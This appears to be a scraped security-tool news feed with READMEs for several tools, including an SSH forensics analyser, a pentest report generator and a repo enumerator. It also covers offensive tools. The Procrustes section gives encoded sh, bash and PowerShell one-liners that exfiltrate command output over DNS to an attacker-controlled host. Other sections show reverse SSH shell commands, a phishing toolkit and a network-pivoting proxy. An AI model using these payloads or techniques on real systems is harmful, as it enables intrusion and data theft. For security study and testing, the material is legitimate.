usage: packetStrider-ssh.py [-h] [-f FILE] [-n NSTREAM] [-m] [-k] [-p]
[-z ZOOM] [-d DIRECTION] [-o OUTPUT_DIR]
[-w WINDOW] [-s STRIDE]

packetStrider-ssh is a packet forensics tool for SSH. It creates a rich
feature set from packet metadata such SSH Protocol message content, direction,
size, latency and sequencing. It performs pattern matching on these features,
using statistical analysis, and sliding windows to predict session initiation,
keystrokes, human/script behavior, password length, use of client
certificates, context into the historic nature of client/server contact and
exfil/infil data movement characteristics in both Forward and Reverse sessions

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE pcap file to analyze
-n NSTREAM, --nstream NSTREAM
Perform analysis only on stream n
-m, --metaonly Display stream metadata only
-k, --keystrokes Perform keystroke prediction
-p, --predict_plot Plot data movement and keystrokes
-z ZOOM, --zoom ZOOM Narrow down/zoom the analysis and plotting to only
packets "x-y"
-d DIRECTION, --direction DIRECTION
Perform analysis on SSH direction : "forward",
"reverse" OR "both"
-o OUTPUT_DIR, --output_dir OUTPUT_DIR
Directory to output plots
-w WINDOW, --window WINDOW
Sliding window size, # of packets to side of window
center packet, default is 2
-s STRIDE, --stride STRIDE
Stride between sliding windows, default is 1

Example

The pcap "forward_reverse.pcap" is from a common TTP of a Reverse SSH shell, a favorite of red teams everywhere. Specifically the following commands were used, to highlight the capabilities of packet strider in a simple way:

  • Forward connection from victim

    • The command for the forward session was ssh user@1.2.3.4 -R 31337:localhost:22 which binds local port 31337 ready for the reverse SSH connection back to the victim PC. This connection can be effected in many ways including manually, by an RCE, SSRF, or some form of persistence. For the purpose of this demo, it is a manual standard forward session.
    • This was NOT the first time the client has seen the server , we see this because the delta for related packets was very small , the server's key fingerprint was already in the client's known_hosts, so the user was not prompted to add it - which would increase the latency of packets.
    • Two consecutive failed password logins by a human, followed by a successful login with an 8+ character password.
    • ls is typed in forward session, in this sequence: 'l' 'w' 'w' 'back-space' 'back-space' 's' and then enter. The total size of data over the wire that is transmitted (as the output of ls) is classified as infiltration, given that is inbound.
  • Now on the attacker's machine (the server), a reverse shell is initiated back to the victim:

    • ssh victim@localhost -p 31337. At this point, which is even before authentication process begins, packet strider has identified the Reverse session SSH initiation, at packet 72
    • Now the attacker has a reverse shell on the victim host. From here they can turn off history settings, and run whatever lateral movement or ransacking highinks they desire. The simple examples in this demo are initial user recon.
    • last is run in the form of keystrokes 'l' 'a' 's' 'r' 'delete' 't' 'enter'
    • whois run in the form of 'w' 'h' 'o' 'enter'
    • exitis run in the form of 'e' 'x' 'i' 't'
  • Then finally with the Forward session the session is closed, just to demonstrate that the forward SSH feature detection still works.

    • exit

Network traffic from this activity is saved to tcpdump.pcap and now it's time to run Packet Strider.

python3 packetStrider-ssh.py -f tcpdump.pcap -k -p -o out



This plot shows a timeline of key predictions (image has been annotated here)



This plot shows some window statistics, useful for a deep dive and experimenting with features.



This plot shows a simple histogram



Inspiration

This project was done as a personal Proof of Concept, as a way for me to practice with some data science libraries in Python, it was heavily inspired by my Coursera studies in Machine Learning and Data Science, in particular the pandas library and the way in which Convolutional Neural Networks (CNN) "stride" through image pixel sets using sliding windows to detect certain features within.


Tips

Packet Strider does a vast amount of "striding" in full capacity mode. This can result in some substantial resource usage if the pcap is large, or more precisely if there are many packets in the pcap. Here are some speed up tips, these are particularly useful as an initial run for example just to see if there was reverse SSH activity predicted, and then adding functionality if you desire.

  • Ensure you are running with the latest patches of modules that do some heavy lifting, eg pyshark/tshark, pandas and matplotlib.
  • The -p --predict_plot option is the most intensive operation. Think about just running with the output to terminal, and then see if you'd like this plotted.
  • Use the -m --metaonly option. This only retrieves the high level metadata such as Protocol names and HASSH data. This can be useful to quickly determine if you are dealing with an interactive session using OpenSSH, or with a file transfer client like Cyberduck.
  • Pre filter the pcap to the ssh traffic.
  • Pre filter the pcap to the stream you want, which you may have learned by previously running with the speedy -m --metaonly option. You can examine only stream "NSTREAM" with the "-n NSTREAM" option, or you can pre filter with wireshark etc.
  • There may be times when you identify something interesting in a subset of a very large packet set. Here you can use the zoom feature to only examine and plot the packets in the region you are interested in. Use -z ZOOM, --zoom ZOOM for this. eg -z 100-500
  • Most times you will be interested in understanding keystroke activity, so while not using the -k option will save processing speed, it also means you won't get this valuable insight.

TODO
  • More protocols!
  • Look at Multi threading and see where this can help processing speed.
  • Improve efficiency of script, particularly plotting times.
  • Improve the Pasting indicator
  • Improve the 'up/down' key indicator
  • Annotate plots with imagemagick or similar
  • Improve the reporting function, write out to disk.
  • The Reverse key indicator is conservative because of packet encapsulation can potentially report two keystrokes. This issue does not exist for forward keystrokes, as the packet order has been treated in case they come in out of order. Examine options here.
  • Port to golang for speed
  • Real time mode
  • Examine the effect of additional tunneling local ports over the forward connection.

Disclaimer

Use at your own risk. See License terms.



Procrustes - A Bash Script That Automates The Exfiltration Of Data Over Dns In Case We Have A Blind Command Execution On A Server Where All Outbound Connections Except DNS Are Blocked

$
0
0

A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked. The script currently supports sh, bash and powershell and is compatible with exec style command execution (e.g. java.lang.Runtime.exec).

Unstaged:


  

Staged:

 

For its operations, the script takes as input the command we want to run on the target server and transforms it according to the target shell in order to allow its output to be exfiltrated over DNS. After the command is transformed, it's fed to the "dispatcher". The dispatcher is a program provided by the user and is responsible for taking as input a command and have it executed on the target server by any means necessary (e.g. exploiting a vulnerability). After the command is executed on the target server, it is expected to trigger DNS requests to our DNS name server containing chunks of our data. The script listens for those requests until the output of the user provided command is fully exfiltrated.

Below are the supported command transformations, generated for the exfiltration of the command: ls

sh:

sh -c $@|base64${IFS}-d|sh . echo IGRpZyBAMCArdHJpZXM9NSBgKGxzKXxiYXNlNjQgLXcwfHdjIC1jYC5sZW4xNjAzNTQxMTc4LndoYXRldi5lcgo=

bash:

bash -c {echo,IG5zbG9va3VwIGAobHMpfGJhc2U2NCAtdzB8d2MgLWNgLmxlbi4xNjAzMDMwNTYwLndoYXRldi5lcgo=}|{base64,-d}|bash

powershell:

powershell -enc UgBlAHMAbwBsAHYAZQAtAEQAbgBzAE4AYQBtAGUAIAAkACgAIgB7ADAAfQAuAHsAMQB9AC4AewAyAH0AIgAgAC0AZgAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAoAGwAcwApACkAKQAuAGwAZQBuAGcAdABoACkALAAiAGwAZQBuACIALAAiADEANgAwADMAMAAzADAANAA4ADgALgB3AGgAYQB0AGUAdgAuAGUAcgAiACkACgA=

Usage
  1. Local testing for bash:
./procroustes_chunked.sh -h whatev.er -d "dig @0 +tries=5" -x dispatcher_examples/local_bash.sh -- 'ls -lha|grep secret' < <(stdbuf -oL tcpdump --immediate -l -i any udp port 53)
  1. Local testing for powershell with WSL2:
stdbuf -oL tcpdump --immediate -l -i any udp port 53|./procroustes_chunked.sh -w ps -h whatev.er -d "Resolve-DnsName -Server wsl2_IP -Name" -x dispatcher_examples/local_powershell_wsl2.sh -- 'gci | % {$_.Name}'
  1. powershell example where we ssh into our NS to get the incoming DNS requests.
./procroustes_chunked.sh -w ps -h yourdns.host -d "Resolve-DnsName" -x dispatcher_examples/curl_waf.sh -- 'gci | % {$_.Name}' < <(stdbuf -oL ssh user@HOST 'sudo tcpdump --immediate -l udp port 53')
  1. More information on the options
./procroustes_chunked.sh --help

procroustes_chunked vs procroustes_full

In a nutshell, assuming we want to exfiltrate some data that has to be broken into four chunks in order to be able to be transmitted over DNS:

  • procroustes_chunked: calls the dispatcher four times, each time requesting a different chunk from the server. It has relatively small payload size, it's fast and doesn't need any special configuration.
  • procroustes_full: calls the dispatcher once, the command that will get executed on the server will be responsible for chunking the data and sending them over. It can have bigger payload size, it's fast (speed can be tuned through the -t parameter) and its speed can be further optimized when the dns_server is running on the name server.
  • procroustes_full/staged: same as procroustes_full, but uses a stager to get the command used by procroustes_full to chunk the data. It has the smallest "payload" size but is also the slowest with regards to exfiltration rate since the actual payload is downloaded over DNS. For its operation it requires the creation of an nsconfig script. Note: the nsconfig script should be created only once per name server (and not per target server).

Some of their differences can also be illustrated through the template commands used for bash:

procroustes_chunked/bash:

%DNS_TRIGGER% `(%CMD%)|base64 -w0|cut -b$((%INDEX%+1))-$((%INDEX%+%COUNT%))'`.%UNIQUE_DNS_HOST%

procroustes_full/bash:

(%CMD%)|base64 -w0|echo $(cat)--|grep -Eo '.{1,%LABEL_SIZE%}'|xargs -n%NLABELS% echo|tr ' ' .|awk '{printf "%s.%s%s\n",$1,NR,"%UNIQUE_DNS_HOST%"}'|xargs -P%THREADS% -n1 %DNS_TRIGGER%

procroustes_full/bash/staged:

(seq %ITERATIONS%|%S_DNS_TRIGGGER% $(cat).%UNIQUE_DNS_HOST%|tr . \ |printf %02x $(cat)|xxd -r -p)|bash

procroustes_chunkedprocroustes_fullprocroustes_full_staged
payload size overhead (bash/powershell)150*NLABELS/500*NLABELS (+CMD_LEN)300/800 (+CMD_LEN)150/400[1]
dispatcher calls ##output/(LABEL_SIZE*NLABELS)[2]11
speed (bash/powershell)
/
/
✓/✓[3]
configuration difficultyeasyeasy+medium

[1] For the staged version, the command is downloaded through DNS, so the listed size is the total payload size as well.

[2] On procroustes_chunked, dispatcher is called multiple times and so as the provided command that is supposed to executed on the server (until all its output is exfiltrated). This behavior is not ideal in case the delivery of commands to the server (i.e. by calling the dispatcher) is time/resource intensive.

It may also cause problems in case the command we are executing on the server is not idempotent (functionality or output-wise, e.g. "ls;rm file") or is time/resource intensive (e.g. find / -name secret). A workaround for this case is to first store the command output to a file (e.g. /tmp/file) and then use the script to read that file.

[3] In the staged version we have the overhead of the time required to get the actual payload over DNS. It should be noted that the script makes use of A records to get the actual payload. Even though this allows our traffic to blend in better with the regular traffic of the target environment, it offers limited channel capacity (e.g. 4 bytes per request). We could make use of other record types like TXT and minimize the stage download time (close to zero) and the stager size.


Tips
  • You probably want to use this script as little as possible, try to transition to a higher bandwidth channel the soonest possible (e.g. HTTP-webshell)
  • In case long text output is expected, you can try compressing it first to speed up the exfil process, e.g. ./procrustes_full.sh ... -o >(setsid gunzip) -- 'ls -lhR / | gzip'
  • Another possibility for big/binary files is to copy them to a path which is accessible for example through HTTP
  • For increased exfil bandwidth in procrustes_full, run the dns_server on your name server. That way, we avoid waiting for the underlying DNS_TRIGGER to timeout before moving on to a new chunk.
  • Ideally, you would have a domain (-h option) with an NS record pointing to a server you control (server where we run tcpdump). Nevertheless, in case the target is allowed to initiate connections to arbitrary DNS servers, this can be avoided by having the DNS trigger explicitly set to use our DNS server (e.g. dig @your_server whatev.er)

Credits
  • Collabfiltrator - idea of chunking the data on the server. It also performs similar functionalities with this script, so check it out.
  • DNSlivery - modified version of DNSlivery is used as the DNS server



Sub404 - A Python Tool To Check Subdomain Takeover Vulnerability

$
0
0


Sub 404 is a tool written in python which is used to check possibility of subdomain takeover vulnerabilty and it is fast as it is Asynchronous.


Why

During recon process you might get a lot of subdomains(e.g more than 10k). It is not possible to test each manually or with traditional requests or urllib method as it is very slow. Using Sub 404 you can automate this task in much faster way. Sub 404 uses aiohttp/asyncio which makes this tool asynchronous and faster.


How it works

Sub 404 uses subdomains list from text file and checks for url of 404 Not Found status code and in addition it fetches CNAME(Canonical name) and removes those URL which have target domain name in CNAME. It also combines result from subfinder and sublist3r(subdomain enumeration tool) if you don't have target subdomains as two is better than one. But for this sublist3r and subfinder tools must be installed in your system. Sub 404 is able to check 7K subdomains in less than 5 minutes.


Key Features:
- Fast( as it is Asynchronous)
- Uses two more tool to increase efficiency
- Saves result in a text file for future reference
- Umm thats it, nothing much !

How to use:

Note: Only works on Python3.7+


Using docker

As an alternative, it is also possible to build a Docker image, so no prerequisites are necessary.

$ docker build -t sub404 .
$ docker run --rm sub404 -h

Usage example:

Note: If subfinder and sublist3r is intalled.
This combines result from sublist3r and subfinder tool and checks for possibility of takeover.
$ python3 sub404.py -d anydomain.com



- If subfinder and sublist3r is not intalled, provide subdomains in text file
$ python3 sub404.py -f subdomain.txt


Note:

This tool is mostly tested in linux but should works on other OS too.


Usage options:
$ python3 sub404.py -h

This will display help for the tool. Here are all the switches it supports.

FlagDescriptionExample
-dDomain name of the taget.python3 sub404.py -d noobarmy.tech
-fProvide location of subdomain file to check for takeover if subfinder is not installed.python3 sub404.py -f subdomain.txt
-pSet protocol for requests. Default is "http".python3 sub404.py -f subdomain.txt -p https or python3 sub404.py -d noobarmy.tech -p https
-oOutput unique subdomains of sublist3r and subfinder to text file. Default is "uniqueURL.txt"python3 sub404.py -d noobarmy.tech -o output.txt
-hshow this help message and exitpython3 sub404.py -h

Note:
This tool fetches CNAME of 404 response code URL and removes all URL which have target domain in CNAME. So chances of false positives are high.

Contributing to Sub 404:
- Report bugs, missing best practices
- DM me with new ideas
- Help in Fixing bugs

My Instagram:

Say Hello r3curs1v3_pr0xy


Credits:

Ice3man543 - Projectdiscovery's subfinder tool is used to enumerate subdomains
aboul3la - aboul3la's sublist3r tool is used to enumerate subdomains



HiddenEyeReborn - HiddenEye With Completely New Codebase And Better Features Set

$
0
0


HiddenEye: Reborn is my second try on doing multi-featured tool for human mistakes exploitation. Currently, HE: RE has mainly phishing features. But we are planning on adding more, you can follow development progress by looking at (REMIND ME TO DO ROADMAP) or Projects Tab on GitHub


Disclaimer

The use of the HiddenEye: Reborn and/or its resources is complete responsibility of the end-user. Developers assume no liabiity and are not responsible for any misuse or damage caused by HiddenEye: Reborn. Some of your actions may be illegal and you can not use this software to test someone without written permission from person or company.


Installation

HE: RE is available on PyPI and can be installed using pip:

pip install hiddeneye-reborn

That's all it takes! HE: RE is now available as a terminal command or as a package to your projects.


Documentation

to be writtenhttps://hiddeneye-reborn.readthedocs.io


FAQ

Q: Why original HiddenEye is no longer maintained?

A: Due to low quality and bad practices used in code.


Q: Is there any example usages for this tool?

A: This is just a tool, and it's up to you how to use it. That's why we take no liability for your actions. There are multiple examples of legal usage of this tool, such as people willing to improve their workflow by testing/educating their employees or collegues and educating them about human vulnerabilities social engineers may use.





Writehat - A Pentest Reporting Tool Written In Python

$
0
0


WriteHat is a reporting tool which removes Microsoft Word (and many hours of suffering) from the reporting process. Markdown --> HTML --> PDF. Created by penetration testers, for penetration testers - but can be used to generate any kind of report. Written in Django (Python 3).


Features:
  • Effortlessly generate beautiful pentest reports
  • On-the-fly drag-and-drop report builder
  • Markdown support - including code blocks, tables, etc.
  • Crop, annotate, caption, and upload images
  • Customizable report background / footer
  • Assign operators and track statuses for individual report sections
  • Ability to clone and template reports
  • Findings database
  • Supports multiple scoring types (CVSS 3.1, DREAD)
  • Can easily generate multiple reports from the same set of findings
  • Extensible design enables power users to craft highly-customized report sections
  • LDAP integration



Installation Prerequisites:
  • Install docker and docker-compose
    • These can usually be installed using apt, pacman, dnf, etc.
    $ sudo apt install docker.io docker-compose

Deploying WriteHat (The quick and easy way, for testing):

WriteHat can be deployed in a single command:

$ git clone https://github.com/blacklanternsecurity/writehat && cd writehat && docker-compose up

Log in at https://127.0.0.1 (default: admin / PLEASECHANGETHISFORHEAVENSSAKE)


Deploying WriteHat (The right way):
  1. Install Docker and Docker Compose

  2. Clone the WriteHat Repo into /opt

    $ cd /opt
    $ git clone https://github.com/blacklanternsecurity/writehat
    $ cd writehat
  3. Create Secure Passwords in writehat/config/writehat.conf for:

    • MongoDB (also enter in docker-compose.yml)
    • MySQL (also enter in docker-compose.yml)
    • Django (used for encrypting cookies, etc.)
    • Admin user Note: Nothing else aside from the passwords need to be modified if you are using the default configuration Note: Don't forget to lock down the permissions on writehat/config/writehat.conf and docker-compose.yml: (chown root:root; chmod 600)
  4. Add Your Desired Hostname to allowed_hosts in writehat/config/writehat.conf

  5. (Optional) Replace the self-signed SSL certificates in nginx/:

    • writehat.crt
    • writehat.key
  6. Test That Everything's Working:

    $ docker-compose up --build

    Note: If using a VPN, you need to be disconnected from the VPN the first time you run bring up the services with docker-compose. This is so docker can successfully create the virtual network.

  7. Install and Activate the Systemd Service:

    This will start WriteHat automatically upon boot

    $ sudo cp writehat/config/writehat.service /etc/systemd/system/
    $ sudo systemctl enable writehat --now
  8. Tail the Service Logs:

    $ sudo journalctl -xefu writehat.service
  9. Create Users

    Browse to https://127.0.0.1/admin after logging in with the admin user specified in writehat/config/writehat.conf Note: There are some actions which only an admin can perform (e.g. database backups) An admin user is automatically created from the username and password in writehat/config/writehat.conf, but you can also promote an LDAP user to admin:

    # Enter the app container
    $ docker-compose exec writehat bash

    # Promote the user and exit
    $ ./manage.py ldap_promote <ldap_username>
    $ exit

Terminology

Here are basic explanations for some WriteHat terms which may not be obvious.

Engagement
├─ Customer
├─ Finding Group 1
│ ├─ Finding
│ └─ Finding
├─ Finding Group 2
│ ├─ Finding
│ └─ Finding
├─ Report 1
└─ Report 2
└─ Page Template

Engagement

An Engagement is where content is created for the customer. This is where the work happens - creating reports and entering findings.


Report

A Report is a modular, hierarchical arrangement of Components which can be easily updated via a drag-and-drop interface, then rendered into HTML or PDF. An engagement can have multiple Reports. A Page Template can be used to customize the background and footer. A Report can also be converted into a Report Template.


Report Component

A report Component is a section or module of the report that can be dragged/dropped into place inside the report creator. Examples include "Title Page", "Markdown", "Findings", etc. There are plenty of built-in components, but you can make your own as well. (They're just HTML/CSS + Python, so it's pretty easy. See the guide below)


Report Template

A Report Template can be used as a starting point for a Report (in an Engagement). Reports can also be converted to Report Templates.


Finding Group

A Finding Group is a collection of findings that are scored in the same way (e.g. CVSS or DREAD). You can create multiple finding groups per engagement (e.g. "Technical Findings" and "Treasury Findings"). When inserting the findings into the Report (via the "Findings" Component, for example), you need to select which Finding Group you want to populate that Component.


Page Template

A Page Template lets you customize report background images and footers. You can set one Page Template as the default, and it will be applied globally unless overridden at the Engagement or Report level.


Writing Custom Report Components



Each report component is made up of the following:

  1. A Python file in writehat/components/
  2. An HTML template in writehat/templates/componentTemplates/
  3. A CSS file in writehat/static/css/component/ (optional)

We recommend referencing the existing files in these directories; they work well as starting points / examples.

A simple custom component would look like this:


components/CustomComponent.py:
from .base import *

class CustomComponentForm(ComponentForm):

summary = forms.CharField(label='Component Text', widget=forms.Textarea, max_length=50000, required=False)
field_order = ['name', 'summary', 'pageBreakBefore', 'showTitle']


class Component(BaseComponent):

default_name = 'Custom Report Component'
formClass = CustomComponentForm

# the "templatable" attribute decides whether or not that field
# gets saved if the report is ever converted into a template
fieldList = {
'summary': StringField(markdown=True, templatable=True),
}

# make sure to specify the HTML template
htmlTemplate = 'componentTemplates/CustomComponent.html'

# Font Awesome icon type + color (HTML/CSS)
# This is just eye candy in the web app
iconType = 'fas fa-stream'
iconColor = 'var(--blue)'

# the "preprocess" function i s executed when the report is rendered
# use this to perform any last-minute operations on its data
def preprocess(self, context):

# for example, to uppercase the entire "summary" field:
# context['summary'] = context['summary'].upper()
return context

Note that fields must share the same name in both the component class and its form. All components must either inherit from BaseComponent or another component. Additionally, each component has built-in fields for name, pageBreakBefore (whether to start on a new page), and showTitle (whether or not to display the name field as a header). So it's not necessary to add those.


componentTemplates/CustomComponent.html:

Fields from the Python module are automatically added to the template context. In this example, we want to render the summary field as markdown, so we add the markdown tag in front of it. Note that you can also access engagement and report-level variables, such as report.name, report.findings, engagement.customer.name, etc.

{% load custom_tags %}
<section class="l{{ level }} component{% if pageBreakBefore %} page-break{% endif %}" id="container_{{ id }}">
{% include 'componentTemplates/Heading.html' %}
<div class='markdown-align-justify custom-component-summary'>
<p>
{% markdown summary %}
</p>
</div>
</section>

componentTemplates/CustomComponent.css (optional):

The filename must match that of the Python file (but with a .css extension instead of .py). It is loaded automatically when the report is rendered.

div.custom-component-summary {
font-weight: bold;
}

Once the above files are created, simply restart the web app and it the new component will populate automatically.

$ docker-compose restart writehat

Manual DB Update/Migration

If an update is pushed that changes the database schema, Django database migrations are executed automatically when the container is restarted. However, user interaction may sometimes be required. To apply Django migrations manually:

  1. Stop WriteHat (systemctl stop writehat)
  2. cd into the WriteHat directory (/opt/writehat)
  3. Start the docker container
$ docker-compose run writehat bash
  1. Once in the container, apply the migrations as usual:
$ ./manage.py makemigrations
$ ./manage.py migrate
$ exit
  1. Bring down the docker containers and restart the service
$ docker-compose down
$ systemctl start writehat

Manual DB Backup/Restore

Note that there is already in-app functionality for this in the /admin page of the web app. You can use this method if you want to make a file-level backup job via cron, etc.

  1. On the destination system:
    • Follow normal installation steps
    • Stop WriteHat (systemctl stop writehat)
  2. On the source system:
    • Stop WriteHat (systemctl stop writehat)
  3. TAR up the mysql, mongo, and writehat/migrations directories and copy the archive to the destination system (same location):
# MUST RUN AS ROOT
$ sudo tar --same-owner -cvzpf db_backup.tar.gz mongo mysql writehat/migrations
  1. On the destination system, make a backup of the migrations directory
$ mv writehat/migrations writehat/migrations.bak
  1. Extract the TAR archive on the destination
$ sudo tar --same-owner -xvpzf db_backup.tar.gz
  1. Start WriteHat on the new system
$ systemctl start writehat

Roadmap / Potential Future Developments:
  • Change tracking and revisions
  • More in-depth review/feedback functionality
  • Collaborative multi-user editing similar to Google Docs
  • JSON export feature
  • Presentation slide generation
  • More advanced table creator with CSV upload feature
  • More granular permissions / ACLs (beyond just user + admin roles)

Known Bugs / Limitations:
  • Chrome or Chromium is the recommended browser. Others are untested and may experience bugs.
  • "Assignee" field on report components only works with LDAP users, not local ones.
  • Annotations on images sometimes jump slightly when applied. It's a known bug that we're tracking with the JS library: https://github.com/ailon/markerjs/issues/40
  • Visual bugs appear occasionally on page breaks. These can be fixed by manually inserting a page break in the affected markdown (there's a button for it in the editor).


Go-RouterSocks - Router Sock. One Port Socks For All The Others.

$
0
0

The next step after compromising a machine is to enumerate the network behind. Many tools exist to expose a socks port on the attacker's machine and send all the traffic through a tunnel to the compromised machine. When several socks ports are available, we have to manage different proxychains configuration to choose the targeted network. This tool will expose one socks port and route the traffic through the configured path.

The idea came after using chisel. Chisel is really helpful but it can get hard to manage many clients as it is opening a new socks port for each new client with reverse mode.


Usage

Start the socks server:

Usage:
rsocks [flags]

Flags:
-h, --help help for rsocks
-i, --ip string IP for socks5 server (default "0.0.0.0")
-p, --port int Socks5 port (default 1080)

Define the routes:

RouterSocks> help
route: Manage route to socks servers
chisel: Liste chisel socks server on localhost
help: help command
RouterSocks> route add 192.168.1.0/24 10.0.0.1:1081
[*] Successfull route added
RouterSocks> chisel
[0] 127.0.0.1:1081
RouterSocks> route add 192.168.2.0/24 0
[*] Successfull route added
RouterSocks> route
192.168.1.0/24 => 10.0.0.1:1081
192.168.2.0/24 => 127.0.0.1:1081

Features
  • Route network through remote or local socks server
  • Use chisel session ID


Gitls - Enumerate Git Repository URL From List Of URL / User / Org

$
0
0


Enumerate git repository URL from list of URL / User / Org. Friendly to pipeline

This tool is available when the repository, such as github, is included in the bugbounty scope. Sometimes specified as an org name or user name rather than a specific repository, you can use this tool to extract url from all public repositories included in the org/user.


This can be used for various actions such as scanning or cloning for multiple repositories.

NOTICE
For unauthenticated requests in github api, the rate limit allows for up to 60 requests per hour. Unauthenticated requests are associated with the originating IP address, and not the user making requests. https://docs.github.com/en/rest/overview/resources-in-the-rest-api

So too many tasks can be blocked by the API for a certain time from github. In this case, you can select the appropriate destination or access and use any IP using the torsocks(e.g torsocks gitls -l user.list) or -tor options.

Installation

From go-get
▶ GO111MODULE=on go get -v github.com/hahwul/gitls

Using homebres
▶ brew tap hahwul/gitls
▶ brew install gitls

Using snapcraft
▶ sudo snap install gitls

Usage
Usage of gitls:
-include-users
include repo of org users(member)
-l string
List of targets (e.g -l sample.lst)
-o string
write output file (optional)
-proxy string
using custom proxy
-tor
using tor proxy / localhost:9050
-version
version of gitls

Case Study

Make all repo urls from repo/org/user urls

sample.lst

https://github.com/hahwul
https://github.com/tomnomnom/gron
https://github.com/tomnomnom/httprobe
https://github.com/s0md3v

make repo url list from sample file

▶ gitls -l sample.lst
https://github.com/hahwul/a2sv
https://github.com/hahwul/action-dalfox
https://github.com/hahwul/asset-of-hahwul.com
https://github.com/hahwul/awesome-zap-extensions
https://github.com/hahwul/backbomb
https://github.com/hahwul/booungJS
https://github.com/hahwul/buildpack-nmap
https://github.com/hahwul/buildpack-zap-daemon
https://github.com/hahwul/can-i-protect-xss
https://github.com/hahwul/cyan-snake
https://github.com/hahwul/dalfox
https://github.com/hahwul/DevSecOps
https://github.com/hahwul/droid-hunter
https://github.com/hahwul/exploit-db_to_dokuwiki
https://github.com/hahwul/ftc
https://github.com/hahwul/gitls
https://github.com/hahwul/go-github-selfupdate-patched
https://github.com/hahwul/hack-pet
...snip...
https://github.com/hahwul/zap-cloud-scan
https://github.com/tomnomnom/gron
https://github.com/tomnomnom/httprobe
https://github.com/s0md3v/Arj un
https://github.com/s0md3v/AwesomeXSS
https://github.com/s0md3v/Blazy
https://github.com/s0md3v/Bolt
...snip...
https://github.com/s0md3v/velocity
https://github.com/s0md3v/XSStrike
https://github.com/s0md3v/Zen
https://github.com/s0md3v/zetanize

Get all repository in org and included users(members)
▶ echo https://github.com/paypal | ./gitls -include-users
....
https://github.com/paypal/tech-talks
https://github.com/paypal/TLS-update
https://github.com/paypal/yurita
https://github.com/ahunnargikar
https://github.com/ahunnargikar/docker-chronos-image
https://github.com/ahunnargikar/docker-tomcat7
https://github.com/ahunnargikar/DockerConDemo
https://github.com/ahunnargikar/elasticsearch-registry-backend
https://github.com/ahunnargikar/elasticsearchindex
https://github.com/ahunnargikar/jenkins-dind
https://github.com/ahunnargikar/jenkins-standalone
https://github.com/ahunnargikar/vagrant-mesos
https://github.com/ahunnargikar/vagrant_docker_registry
https://github.com/anandpalanisamy
https://github.com/anilgursel
https://github.com/anilgursel/squbs-sample
https://github.com/bluepnume

Automated testing with gitleaks
▶ gitls -l sample.lst | xargs -I % gitleaks --repo-url=% -v

All clone target's repo
▶ echo "https://github.com/paypal" | gitls | xargs -I % git clone %



Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>